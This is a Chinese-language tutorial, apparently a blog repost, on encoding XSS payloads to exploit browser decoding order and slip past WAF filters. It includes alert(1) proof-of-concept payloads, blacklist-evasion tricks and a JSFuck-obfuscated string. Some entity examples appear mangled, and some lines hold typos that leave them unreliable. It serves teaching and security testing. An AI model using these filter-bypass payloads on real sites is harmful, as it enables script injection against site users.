一、一般可利用的編碼

1.URL編碼格式：%十六進制數

記住常用符號、字母的 ASCII 碼，能熟練轉換 10 -16 進制即可。中文的URL編碼略有不同，因為用的地方沒有，也就不想寫了

如何利用：瀏覽器的 URL 地址欄，反射型 XSS，可以將特殊字符進行 URL 編碼，可以嘗試多次編碼試一試；POST過去的數據，存儲型 XSS，跟反射型的一樣。最后提一點：因為一般網站處理數據的時候最開始解碼的一般是 URL 解碼，所以可以在用其他編碼構造完成 payload 后，最后再進行 URL 編碼，由此可見，可以根據解碼順序，靈活得進行編碼，最先解碼的，就最后編碼，懂我什么意思吧，我也不太懂我到底有沒有說懂

2.html實體編碼格式：&#十進制/十六進制; （一般是用十進制）十六進制的時候為 &#x十六進制數

對照ASCII碼表基本就可以輕松轉換了

HTML實體編碼對照表參考地址：https://www.w3school.com.cn/html/html_entities.asp

如何利用：注意不要編碼標簽的 <> 、屬性名、以及賦值號（等號=，冒號：）就可以了

3.JS編碼格式：①--unicode：\u十六進制 ②--八進制、十六進制

如何利用：一般使用 jsUnicode編碼比較多，其他的兩種還在研究，望得到高人指點

4.css編碼格式：1~6位十六進制數后邊就不能直接緊跟數字或字母，否則會被當成轉義里的內容處理，所以CSS 選擇了空格作為終止標識，在解碼的時候，再將空格去除。

如何利用：在使用 style 屬性或標簽的時候使用，或者也可以在引入外部 CSS 文件的時候，將引入的文件內容進行編碼

二、弄清楚瀏覽器解碼順序

瀏覽器解析順序：

示例HTML代碼：<a href="JAVAscript:%0a%61l\u0065rt(1)">click me</a>

解釋：1.首先瀏覽器接收到HTML代碼，會先開始進行HTML解析，構造DOM樹，粗略的講就是識別 <> 這些標簽，賦予其特殊含義，區別于純文本內容。注意此時并不會做任何解碼操作，所以構造 &#lt;img src="JavaScript:al\u0065rt(1)">是不會彈窗的，因為沒有識別到標簽，它相當于就是一個純文本，具體來說就是：標簽屬性名和賦值符號不能編碼，但是標簽屬性的值可以編碼

2.DOM樹構造完成，開始HTML解碼，變成了<a href="javascript:%0a%61l\u0065rt(1);">click me</a>

3.唉，碰到鏈接類屬性 href 了，盡管發現了是javascript偽協議，瀏覽器也會直接 URL 解碼一次，然后就變成了 <a href="javascript:al\u0065rt(1)">click me</a>

4.解碼后，因為是 javascript 偽協議，所以 JS 解析器便開始工作了，解析成了 <a href="javascript:alert(1)">click me</a>,注意在識別協議的時候，協議是不能被任何編碼的，除非在識別之前已經被解碼了，不然的話是不能被識別出來的的，比如說 href="j%61vascript:alert(1)" ，冒號被編碼也不行，瀏覽器雖說會 URL 解碼，但是并不會解碼之后再識別一次這是什么協議，于是不管是 http 協議還是 javascript 偽協議也好，此時都發揮不了作用而且，此時 href="j%61vascript:alert(1)" 中的冒號括號也不能被 js 編碼，否則不會彈窗

5.然后就順利彈窗了

6.當然，并不是所有時候都是這種解碼順序，要依據具體情況而定。

7.演示一下如何自己進行編碼：可以看到上述例子瀏覽器解碼順序為 HTML實體解碼 -> URL解碼 -> JSUnicode解碼 <-----> 于是便反過來編碼 JSUnicode解碼 -> URL解碼 -> HTML實體解碼假設要編碼的內容：<img/src/onerror=alert(1)>，可以先思考一下該如何編碼，再往下看

首先JSUnicode編碼： <img/src/onerror=\u0061\u006c\u0065\u0072\u0074(1)>，加不加雙引號包裹onerror后面的內容無所謂，加也好，不加也好，最好不加，因為雙引號被過濾了的話，會更麻煩，依據前文所述，此處的注意點有：不能編碼括號 (),還有一點很奇怪，彈窗提示的 1 字符也不能被編碼，否則不會彈，除非加引號包裹起來。其次HTML編碼： <img/src/onerror=\u0061u006c\u0065\u0072\u0074(1)>此處的注意點有：不能編碼標簽的 <>、屬性、等號=最后URL編碼： %3Cimg/src/onerror%3D%5Cu0061%26%23x5C%3B%26%23x75%3B006c%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%29%3E

最后一個問題：這句payload應該插在哪？一般是反射型的XSS直接便可以見到效果，有php環境的可以試一下：a.php 內容為 <?php echo $_GET["a"]; ?>，然后用瀏覽器打開這個文件，后面接 ?a=%3Cimg/src/onerror%3D%5Cu0061%26%23x5C%3B%26%23x75%3B006c%5Cu0065%5Cu0072%5Cu0074%26%23x28%3B1%29%3E，即可彈窗

如圖

注意點總結：

1.轉義編碼應當只出現在標示符部分，不能用于對語法有真正影響的符號，也就是括號，或者是引號、等號、冒號

2.瀏覽器是不會在html標簽里解析js中的那些編碼的！所以我們在onerror=后面放js中的八進制、十六進制編碼（jsUnicode編碼除外）是不會解析你放進去是什么解析就是什么!而另一方面，如果想用這種方式來替換掉圓括號，或者引號，會判定為失敗。同時，主要注意的方式，上邊這種直接在字符串外進行轉移的方式，只有Unicode 轉義方式被支持，其他轉義方式則不行。其實，這樣的策略是正確的，因為對于JavaScript，轉義編碼應當只出現在標示符部分，不能用于對語法有真正影響的符號，也就是括號，或者是引號。其實，這樣的處理方法，反而是比CSS 更加合理的。

3.HTML解析器在建立文檔樹的時候會針對節點內的Entity編碼（即實體編碼）解碼后傳輸。

4.使用DOM 操作，對DOM Tree 造成了改變，會調用到 HTML 解析器重新對其解析，意思就是，用 DOM 操作創建了節點標簽什么的，會重新調用 HTML 解析

5.在一個頁面中，可以觸發 JS 解析器的方式有這么幾種：直接嵌入< script> 代碼塊。通過< script sr=… > 加載代碼。各種HTML CSS 參數支持JavaScript：URL 觸發調用。CSS expression(…) 語法和某些瀏覽器的XBL 綁定。事件處理器(Event handlers),比如 onload, onerror, onclick等等。定時器，Timer(setTimeout, setInterval)eval(…) 調用。可以想一下這個 <script>\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0031\u0029</script>，為什么這個不彈窗呢？？？？？？？？？？？？？？？？？不清楚可以看一下參考文章的第一篇！！

6.<script>alert('1')</script>是無法彈框的，因為script標簽內無法解析HTML實體編碼。但是 <svg><script>alert('1')</script>是可以被解析的<svg>屬于外部標簽，是一種特殊的標簽，它使用 XML 格式定義圖像，支持 XML 解析。因為 xml 支持在標簽內解析 HTML 實體字符，所以在 XML 中 ( 會被解析成（。

另外一些例子：以下兩個表示相同：<img src="http://www.example.com"><img src="http://www.example.com">因為在識別協議之前，已經HTML解碼了，所以并不會出現識別協議失敗

下面兩個例子代碼不會執行，因為，編碼的是標簽本身的結構而非節點內的內容：(這一點非常重要)<img src="http://www.example.com"><img src="http://www.example.com">

三、騷操作

HTML新增字符:冒號換行

1） HTML編碼：實體編號，就是ASCII碼的10進制，還可以$#000060來實現繞過一些WAF。2）當 <> 這些符號被編碼的時候，因為在JS中常見的傳輸中文或者非ASCII碼字符就會使用unicode編碼，同樣這種編碼可以用來繞過一些WAF。如 '<'：編碼為 '\u003c'(unicode編碼)，'a'->\x61。此時需要考慮網站傳輸數據的方式！3) 如果任何形式引號都被攔截的情況下，你可以使用fromCharCode()方法來創造你需要的XSS Payload.如<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>，然后再編碼4）還有，數字編碼前面加「0」，這也是一條很好的繞過 WAF 的向量。5）多觀察網站傳輸數據的編碼格式，利用其對應特點進行編碼6) 巧用 location + javascript 偽協議 <img/onerror=loaction="javascript:alert%611)"> 通過location會經過一層url解碼<img/src/onerror=location="javasc"+"ript:a"+"lert%28"+"1)">這樣寫還可以繞過黑名單限制

參考文章（建議全部看一遍，會有更多的收獲）

理解瀏覽器解析規則文章http://bobao.360.cn/learning/detail/292.htmlXSS編碼剖析https://www.freebuf.com/articles/web/43285.htmlBrowser Security-超文本標記語言（HTML）https://www.madebug.net/static/drops/tips-147.html編碼與解碼-瀏覽器做了什么http://xuelinf.github.io/2016/05/18/編碼與解碼-瀏覽器做了什么/深入理解瀏覽器解析機制和XSS向量編碼文章總結https://www.wjlshare.xyz/2019/08/10/深入理解瀏覽器解析機制和xss向量編碼-文章總結/XSS與字符編碼的那些事兒 ---科普文https://www.madebug.net/static/drops/tips-689.htmlXSS之繞過WAF總結https://www.cnblogs.com/wjrblogs/p/12341190.html

推薦一些在線編碼的網站：有 0x_Jin 大佬的 XSS_ENCODE 谷歌插件，解壓后可用地址：鏈接：https://pan.baidu.com/s/1JFMC1uuWq0mgUF07O8SAlQ 提取碼：3rj4

名稱地址CTF在線工具http://ctf.ssleye.com/HTML字符實體轉換https://www.qqxiuzi.cn/bianma/zifushiti.phpUnicode與中文互轉 16進制Unicode編碼轉換、還原http://www.msxindl.com/tools/unicode16.aspUnicode 編碼&解碼https://www.css-js.com/tools/unicode.html

注：純推薦，沒打廣告

---以上內容均來自：https://www.cnblogs.com/wjrblogs/p/12497194.html#3378151910

下面我補充一些我知道其他的騷操作操作：

不使用任何字母

js中任意字符串可以寫成

+ASCII碼的8位形式，也就是查詢到字母的ASCII碼然后將其轉換為8進制時候的結果。

這樣：

"..."["163165142163164162"]["143157156163164162165143164157162"]("141154145162164506151")()

2.JSFuck編碼

也就是這樣：

[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]])

哈，是不是暗自fuck，

編碼網址：https://www.bugku.com/tools/jsfuck/

上述字符：是alert(1)，經過JSFuck，得到的，在控制臺執行后